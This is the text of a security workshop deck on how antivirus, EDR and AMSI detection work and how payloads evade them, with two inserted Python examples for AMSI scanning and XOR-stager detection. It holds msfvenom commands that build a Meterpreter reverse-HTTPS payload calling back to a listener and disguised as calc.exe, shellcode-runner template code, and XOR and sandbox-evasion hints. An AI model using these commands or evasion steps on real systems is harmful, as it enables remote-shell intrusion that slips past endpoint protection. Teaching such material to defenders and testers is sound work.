HOW THE ANTIVIRUSES WORK
BEHIND THE AV LINE
https://twitter.com/dawid_golak
BEHIND THE AV LINE
ANTIVIRUSES
https://www.av-comparatives.org/list-of-enterprise-av-vendors-pc/
BEHIND THE AV LINE
BEYOND THE ANTIVIRUS, OR THE WORLD OF EDR
▸ Usually two components.
▸ Kernel mode (one or more drivers)
- process monitoring
▸ Usermode (usually as a service)
- support functions (reinstall/update)
- API hooking inside the process
AMSI - ANTIMALWARE SCAN INTERFACE
BEHIND THE AV LINE
AMSI
▸ The Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product that's present on a machine.
▸ AMSI provides enhanced malware protection for your end-users and their data, applications, and workloads.
https://github.com/BC-SECURITY/DEFCON27/blob/master/Introduction_to_AMSI_Bypasses_and_Sandbox_Evasion.pdf
BEHIND THE AV LINE
WINDOWS COMPONENTS THAT INTEGRATE WITH AMSI
▸ User Account Control, or UAC (elevation of EXE, COM, MSI, or ActiveX
installation)
▸ PowerShell (scripts, interactive use, and dynamic code evaluation)
▸ Windows Script Host (wscript.exe and cscript.exe)
▸ JavaScript and VBScript
▸ Office VBA macros
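An added example, not part of the deck, of an application integrating with AMSI the way the components listed above do: it calls the documented amsi.dll entry points through Python's ctypes and maps the raw AMSI_RESULT to a verdict. The function and constant names come from amsi.h; the app and content names are placeholders, and the scan itself only runs on Windows.

```python
import ctypes
import sys

# AMSI_RESULT values from amsi.h in the Windows SDK.
AMSI_RESULT_CLEAN = 0
AMSI_RESULT_NOT_DETECTED = 1
AMSI_RESULT_BLOCKED_BY_ADMIN_START = 0x4000
AMSI_RESULT_BLOCKED_BY_ADMIN_END = 0x4FFF
AMSI_RESULT_DETECTED = 32768

# Microsoft's documented AMSI test string; a working provider flags it as malware.
AMSI_TEST_SAMPLE = "AMSI Test Sample: 7e72c3ce-861b-4339-8740-0ac1484c1386"


def classify(result):
    """Map a raw AMSI_RESULT to the verdict an integrating application acts on.
    The first check mirrors the AmsiResultIsMalware() macro from amsi.h."""
    if result >= AMSI_RESULT_DETECTED:
        return "malware"
    if AMSI_RESULT_BLOCKED_BY_ADMIN_START <= result <= AMSI_RESULT_BLOCKED_BY_ADMIN_END:
        return "blocked-by-admin"
    return "clean"


def amsi_scan(content, app_name="amsi-demo", content_name="demo-script"):
    """Submit a string to the registered AMSI provider and return the raw AMSI_RESULT.
    Windows only: amsi.dll does not exist on other platforms."""
    if not sys.platform.startswith("win"):
        raise OSError("AMSI is only available on Windows")
    amsi = ctypes.WinDLL("amsi")
    amsi.AmsiInitialize.argtypes = [ctypes.c_wchar_p, ctypes.POINTER(ctypes.c_void_p)]
    amsi.AmsiScanBuffer.argtypes = [ctypes.c_void_p, ctypes.c_char_p, ctypes.c_uint32,
                                    ctypes.c_wchar_p, ctypes.c_void_p, ctypes.POINTER(ctypes.c_int)]
    amsi.AmsiUninitialize.argtypes = [ctypes.c_void_p]
    ctx = ctypes.c_void_p()
    if amsi.AmsiInitialize(app_name, ctypes.byref(ctx)) != 0:   # HRESULT S_OK is 0
        raise OSError("AmsiInitialize failed")
    try:
        data = content.encode("utf-16-le")      # PowerShell hands script text to AMSI as UTF-16
        result = ctypes.c_int()
        hr = amsi.AmsiScanBuffer(ctx, data, len(data), content_name, None, ctypes.byref(result))
        if hr != 0:
            raise OSError("AmsiScanBuffer failed: 0x%08x" % (hr & 0xFFFFFFFF))
        return result.value
    finally:
        amsi.AmsiUninitialize(ctx)


if __name__ == "__main__":
    print("provider verdict on the AMSI test sample:", classify(amsi_scan(AMSI_TEST_SAMPLE)))
```

On a Windows host with a healthy provider the test sample comes back as "malware"; if it comes back "clean", AMSI is disabled or no provider is registered, which is worth an alert in itself.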
BEHIND THE AV LINE
AMSI
https://github.com/BC-SECURITY/DEFCON27/blob/master/Introduction_to_AMSI_Bypasses_and_Sandbox_Evasion.pdf
BINARY VS SCRIPTING
STATIC
DYNAMIC
NETWORK
CATCH ME, IF YOU CAN
BEHIND THE AV LINE
STATIC ANALYSIS
▸ copy
▸ move
▸ delete
▸ view
▸ touch
BEHIND THE AV LINE
STATIC ANALYSIS - VIRUSTOTAL.COM
BEHIND THE AV LINE
DYNAMIC ANALYSIS
▸ Sandbox
BEHIND THE AV LINE
NETWORK ANALYSIS
BEHIND THE AV LINE
NETWORK ANALYSIS
METASPLOIT
HOW THE TEMPLATES WORK
BEHIND THE AV LINE
MSF TEMPLATES
▸ msfvenom -p windows/[x86/x64]/meterpreter/reverse_https LHOST=10.0.2.16 LPORT=443 -f exe -o calc.exe
▸ /usr/share/metasploit-framework/data/templates/src/pe/exe

#include <stdio.h>

#define SCSIZE 4096
char payload[SCSIZE] = "PAYLOAD:";   /* marker that msfvenom overwrites with the raw shellcode */
char comment[512] = "";

int main(int argc, char **argv) {
    /* cast the buffer to a function pointer and jump straight into the shellcode */
    (*(void (*)()) payload)();
    return(0);
}
LET'S WALK THE WALK,
AND STOP TALKING THE TALK
WORKSHOP
PE FILE
BEHIND THE AV LINE
MSFVENOM SAMPLE - BYPASS STATIC ANALYSIS
▸ msfvenom -p windows/x64/meterpreter/reverse_https
LHOST=10.0.2.16 LPORT=443 -f hex
▸ xor [+hint]
BEHIND THE AV LINE
MSFVENOM SAMPLE - BYPASS STATIC ANALYSIS
e.g. Windows Defender: https://github.com/matterpreter/DefenderCheck
BEHIND THE AV LINE
WHERE IS MY DATA
▸ char shellcode[] = "\xfc\x48\x83...";
▸ .text
▸ .data
▸ .rsrc
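An added defender-side example, not from the deck, covering the two slides above: why a single-byte XOR of the raw stager is a weak answer to static analysis. A scanner only has to try all 256 keys against a known prologue, and a small PE section parser then reports whether the hit sits in .text, .data or .rsrc. The five-byte prologue extends the slide's \xfc\x48\x83 with its well-known continuation, the section parser is hand-written so the script runs offline without pefile, and the PE in demo() is constructed here.

```python
import struct

# Opening bytes of the Metasploit x64 stager (cld; and rsp,-16). The slide quotes only
# "\xfc\x48\x83"; the two extra bytes are the known continuation and cut false positives.
STAGER_PROLOGUE = bytes.fromhex("fc4883e4f0")


def find_xored_pattern(blob, pattern=STAGER_PROLOGUE):
    """Return (offset, key) for each spot where pattern appears under a single-byte XOR.
    Key 0 is the unencoded case, so plain copies of the stager are reported as well."""
    hits = []
    for key in range(256):
        needle = bytes(b ^ key for b in pattern)
        pos = blob.find(needle)
        while pos != -1:
            hits.append((pos, key))
            pos = blob.find(needle, pos + 1)
    return sorted(hits)


def section_of(pe, offset):
    """Name the PE section whose raw data covers a file offset (.text, .data, .rsrc, ...)."""
    if pe[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    nsect = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size            # section headers follow the optional header
    for i in range(nsect):
        name, _, _, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, table + 40 * i)
        if raw_ptr <= offset < raw_ptr + raw_size:
            return name.rstrip(b"\0").decode()
    return None


def fake_pe_with(payload, section=b".data", raw_ptr=0x200):
    """Constructed, non-runnable PE skeleton: DOS stub, COFF header, one section, no optional header."""
    coff = struct.pack("<4sHHIIIHH", b"PE\0\0", 0x8664, 1, 0, 0, 0, 0, 0)
    sect = struct.pack("<8sIIIIIIHHI", section.ljust(8, b"\0"), len(payload), 0x1000,
                       len(payload), raw_ptr, 0, 0, 0, 0, 0xC0000040)
    header = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40) + coff + sect
    return header.ljust(raw_ptr, b"\0") + payload


def demo(key=0x5A):
    """Constructed sample: the prologue XOR-encoded with one byte and parked in .data."""
    encoded = bytes(b ^ key for b in STAGER_PROLOGUE)
    sample = fake_pe_with(b"\0" * 16 + encoded + b"\0" * 16)
    return [(off, k, section_of(sample, off)) for off, k in find_xored_pattern(sample)]
```

The same loop over a real binary's bytes shows the defender's view of the "where is my data" question: the section changes, the detectability of a one-byte key does not.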
BEHIND THE AV LINE
BYPASS DYNAMIC
▸ hint 0x01
BEHIND THE AV LINE
BYPASS DYNAMIC
▸ hint 0x02
BEHIND THE AV LINE
BYPASS DYNAMIC
▸ hint 0x03
BEHIND THE AV LINE
BYPASS DYNAMIC
▸ workstation fingerprint
WHAT’S NEXT?
THX
